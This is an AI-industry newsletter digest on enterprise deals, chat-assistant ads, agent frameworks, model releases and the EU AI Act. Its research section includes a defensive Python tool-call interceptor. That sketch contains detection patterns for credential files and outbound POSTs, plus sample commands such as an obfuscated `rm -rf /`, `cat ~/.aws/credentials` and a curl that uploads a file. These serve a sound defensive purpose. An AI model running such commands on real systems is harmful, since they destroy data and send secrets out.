🎯 Top 3 Things to Know
1. EY and Microsoft announced a $1 billion, five-year alliance to push enterprise AI from pilots to production. The structural move is the staffing model: Microsoft's Forward Deployed Engineers sit next to EY industry consultants and co-build inside finance, tax, risk, HR, and supply-chain workflows in regulated sectors. EY is "client zero," scaling Microsoft 365 Copilot to 400,000 employees after a 150,000-seat rollout it credits with a 15% productivity lift. Relevant for any organization where AI pilots stall on integration, governance, and change management rather than model quality. Watch whether the FDE pattern shows up at other system integrators in the next quarter, since it would mean the consulting industry is rebundling around vendor engineering capacity. Microsoft Source
2. OpenAI launched a self-serve Ads Manager inside ChatGPT, opening the assistant to direct advertiser campaigns. The platform lets advertisers create, target, and optimize campaigns directly in ChatGPT, and arrives the same week Klarna's Shopping Search app went live in the assistant with 100 million products from 400 million listings across 13 markets. OpenAI is reportedly targeting $2.5 billion in ad revenue this year and $100 billion by 2030. The friction this addresses is platform unit economics: subscription revenue alone has not covered inference cost at scale. For teams building on ChatGPT, the change reshapes the surface they are competing for and the incentives behind ranking. Worth watching the first transparency report on how organic and paid results are differentiated inside conversations. The AI Marketers recap
3. Block open-sourced Goose, a developer framework for building local AI agents that work across the developer's machine, tools, and connected services. Goose is pitched as a way to build agents without stitching together half a dozen SDKs, and ships with adapters for common developer services and the Model Context Protocol. The bet, under Jack Dorsey's renewed focus on developer tooling, is that open infrastructure will pull builders away from closed vertical agent platforms. For teams evaluating agent frameworks, Goose is worth a side-by-side comparison against LangGraph and CrewAI on the workflows already in production. Watch the ecosystem signals: server count, community PRs, and whether the first non-Block production deployments surface within 60 days. Coverage
🚀 Frontier Models & Features
- Gemini 3.5 Flash is now the default model in Google Search AI Mode, globally. Google is pushing a Flash-tier model into the highest-volume surface it owns, citing sustained frontier performance on agentic and coding tasks at lower cost. Google blog
- Anthropic's Fast mode added Claude Opus 4.7 as a research preview. Faster token generation at premium pricing, aimed at agent loops where latency, not raw cost, is the bottleneck. Anthropic news
- Claude Developer Platform shipped cache diagnostics in public beta. The API now explains where a prompt cache prefix diverged from the previous turn, removing one of the more frustrating opaque failure modes in long-running agent loops. Anthropic news
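The platform reports this divergence server-side. While debugging, the same question can be approximated client-side: because a prompt cache matches on an exact prefix, what matters is which block first differs from the previous turn. What follows is a minimal sketch that assumes the prompt is held as an ordered list of text blocks. `find_prefix_divergence` and `Divergence` are hypothetical names, not part of the Claude API, and the sample prompts are made up.

```python
from dataclasses import dataclass
from typing import Optional, Sequence


@dataclass
class Divergence:
    block_index: int  # first prompt block that differs from the previous turn
    char_offset: int  # first differing character inside that block
    previous: str     # short snippet of the previous turn's text at that point
    current: str      # short snippet of this turn's text at that point


def find_prefix_divergence(previous: Sequence[str], current: Sequence[str],
                           context: int = 20) -> Optional[Divergence]:
    """Return where `current` stops sharing a prefix with `previous`.

    Returns None when `previous` is a full prefix of `current`, i.e. the
    previous turn's prompt could in principle be reused from cache.
    """
    for i, (old, new) in enumerate(zip(previous, current)):
        if old == new:
            continue
        # First character position where the two blocks disagree; if one block
        # is a prefix of the other, the divergence is where the shorter one ends.
        offset = next((j for j, (a, b) in enumerate(zip(old, new)) if a != b),
                      min(len(old), len(new)))
        return Divergence(i, offset,
                          old[offset:offset + context], new[offset:offset + context])
    if len(current) < len(previous):
        # This turn dropped trailing blocks that the previous turn had.
        i = len(current)
        return Divergence(i, 0, previous[i][:context], "")
    return None


# Hypothetical prompts: a date interpolated into the prompt changed between turns.
prev_turn = ["You are a helpful agent.", "Tools: search, fetch", "Today is 2026-05-11"]
this_turn = ["You are a helpful agent.", "Tools: search, fetch", "Today is 2026-05-12",
             "User: summarize the report"]
print(find_prefix_divergence(prev_turn, this_turn))
# → Divergence(block_index=2, char_offset=18, previous='1', current='2')
```

Anything volatile placed early in the prompt, like the date here, moves the divergence point toward the start and shrinks the reusable prefix. That is why stable content usually belongs before volatile content.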
🔬 Research Worth Reading
AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use (Yang / arXiv). arXiv
- TL;DR: A runtime safety layer that sits between an agent and its tools, normalizes obfuscated shell commands, detects multi-step attack chains, and returns a structured allow/warn/block/review verdict before each tool call executes.
- Stat: Targets the failure mode where a single misjudged action, like `rm -rf /` or a credential exfiltrated through a benign-looking POST, causes irreversible damage in production agent deployments.
- Apply it: Before granting an agent broad shell or HTTP access, add an interception layer that logs and classifies every tool call, then sample-review the "warn" bucket weekly. Start with file-system and credential operations, where the blast radius is widest.
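The allow/warn/block/review flow described above can be prototyped in a few dozen lines. This is a minimal sketch that assumes tool calls arrive as shell command strings. The normalization step, the regex patterns, and the `Interceptor` class are hypothetical illustrations, not AgentTrust's implementation, and regex rules this simple are easy to evade.

```python
import re
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Tuple


class Verdict(Enum):
    ALLOW = "allow"
    WARN = "warn"
    BLOCK = "block"
    REVIEW = "review"


def normalize(command: str) -> str:
    """Undo trivial obfuscation: drop quotes and backslashes, collapse whitespace."""
    command = re.sub(r"[\"'\\]", "", command)
    return " ".join(command.split())


# Hypothetical rule set; real coverage would need to be far broader.
DESTRUCTIVE = re.compile(r"\brm\s+-\w*r\w*\s+/(\s|\*|$)")        # rm -rf / and variants
SECRET_PATH = re.compile(r"\.aws/credentials|\.ssh/id_|\.env\b")  # common credential files
OUTBOUND_POST = re.compile(r"\bcurl\b.*(-X\s*POST|--data|-d\s)")  # data leaving the host


@dataclass
class Interceptor:
    touched_secrets: bool = False  # session state for multi-step chain detection
    log: List[Tuple[str, Verdict]] = field(default_factory=list)

    def check(self, command: str) -> Verdict:
        cmd = normalize(command)
        reads_secret = bool(SECRET_PATH.search(cmd))
        posts_data = bool(OUTBOUND_POST.search(cmd))
        if DESTRUCTIVE.search(cmd):
            verdict = Verdict.BLOCK
        elif posts_data and (reads_secret or self.touched_secrets):
            # Chain: a secret was (or is being) read and data is now being sent out.
            verdict = Verdict.BLOCK
        elif reads_secret:
            verdict = Verdict.REVIEW
        elif posts_data:
            verdict = Verdict.WARN
        else:
            verdict = Verdict.ALLOW
        if reads_secret:
            self.touched_secrets = True
        self.log.append((cmd, verdict))
        return verdict

    def bucket(self, verdict: Verdict) -> List[str]:
        """Commands that received a given verdict, e.g. for a weekly WARN review."""
        return [cmd for cmd, v in self.log if v is verdict]


gate = Interceptor()
for call in ["ls -la", "r\\m -'rf' /", "curl -X POST https://example.com -d hi",
             "cat ~/.aws/credentials", "curl -d @/tmp/out https://example.com"]:
    print(gate.check(call).value, "|", call)
```

Keeping `touched_secrets` as session state lets the gate catch the two-step chain of reading a secret and then sending a POST, which neither command would trigger on its own. `bucket(Verdict.WARN)` pulls out the sample for the weekly review.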
SkillGenBench: Benchmarking Skill Generation Pipelines for LLM Agents (Zhou, Zhang et al. / SJTU and QuantaAlpha). arXiv
- TL;DR: A controlled protocol that feeds raw corpora to a "skill generator" and then executes the resulting standardized skill artifacts under a fixed harness, so different skill-generation methods can be compared head-to-head instead of through cherry-picked demos.
- Stat: The benchmark unifies skill execution and evaluation across pipelines, replacing the current ad-hoc setup where each skill-generation paper reports on its own bespoke harness.
- Apply it: If a team is letting an agent auto-generate reusable skills from documentation, route those generated skills through a fixed eval harness before promotion, rather than judging them by their first successful run.
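The promotion gate in the last point can be sketched as a fixed set of test cases that every generated skill must pass before it is kept. This is a minimal sketch that assumes a skill can be modeled as a plain text-in, text-out function. `run_harness`, `promote`, the 0.9 threshold, and the toy candidates are hypothetical choices, not SkillGenBench's protocol.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

Skill = Callable[[str], str]  # hypothetical: a skill modeled as text in, text out


@dataclass
class HarnessResult:
    name: str
    passed: int
    total: int

    @property
    def pass_rate(self) -> float:
        return self.passed / self.total if self.total else 0.0


def run_harness(name: str, skill: Skill, cases: List[Tuple[str, str]]) -> HarnessResult:
    """Score one generated skill against the same fixed cases every candidate sees."""
    passed = 0
    for given, expected in cases:
        try:
            if skill(given) == expected:
                passed += 1
        except Exception:
            pass  # a crash is a failed case, not a reason to stop evaluating
    return HarnessResult(name, passed, len(cases))


def promote(candidates: Dict[str, Skill], cases: List[Tuple[str, str]],
            threshold: float = 0.9) -> List[str]:
    """Names of skills whose pass rate on the fixed harness meets the threshold."""
    results = [run_harness(name, skill, cases) for name, skill in candidates.items()]
    return [r.name for r in results if r.pass_rate >= threshold]


CASES = [("hello world", "Hello World"), ("agent skills", "Agent Skills"), ("a", "A")]
CANDIDATES: Dict[str, Skill] = {
    "title_case": str.title,
    "capitalize_first": lambda s: s[:1].upper() + s[1:],
    "crashes": lambda s: s[100],
}
print(promote(CANDIDATES, CASES))  # → ['title_case']
```

`capitalize_first` succeeds on the single-character case, so a first-run check could have waved it through. The shared harness scores it 1 of 3 and holds it back.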
🏢 Enterprise in the Wild
- Klarna's Shopping Search app launched inside ChatGPT. Live prices, availability, and offers from 100 million products and 400 million listings across 13 markets, surfaced inside the assistant conversation. PYMNTS
- Netflix handed ad-buying to AI agents. Ad-placement workflows are being run by agents with budget authority, an early test of agentic procurement in a regulated category. Reference
- Anthropic shipped 20+ legal MCP connectors and 12 practice-area plugins for law firms and in-house teams, covering research, contracts, discovery, and matter management. Anthropic news
🛠️ Tooling & Ecosystem
- Block released Goose, an open-source agent framework, covered in the Top 3. Coverage
- OpenAI Codex graduated Goal mode out of preview. Codex can now work toward a stated milestone for hours or days, with check-in and pause as the primary control surface rather than per-step approval. Reference
- Anthropic Claude for Small Business brings Claude into QuickBooks, PayPal, HubSpot, Canva, Docusign, and Google Workspace with prebuilt workflows. Anthropic news
⚖️ Policy & Regulation
- EU AI Act timeline relief is moving toward formal adoption. The May 7 political agreement between Council, Parliament, and Commission postpones high-risk obligations under Annex III from August 2026 to December 2027 and narrows the high-risk scope. Two new prohibitions, on AI-generated non-consensual intimate imagery and CSAM, take effect December 2, 2026. Formal adoption is expected by July, ahead of the original August 2026 date when the high-risk obligations would have applied. Inside Privacy
📌 Watch List
- Pilot-to-production scaling at large enterprises and the consulting structures forming around it.
- Self-serve ad surfaces and agentic commerce inside chat assistants.
- Open-source agent frameworks competing with closed vertical platforms.
- Runtime tool-call interception as a standard layer in agent stacks.
- Chinese open-weight coding models closing the cost gap on Western frontier inference.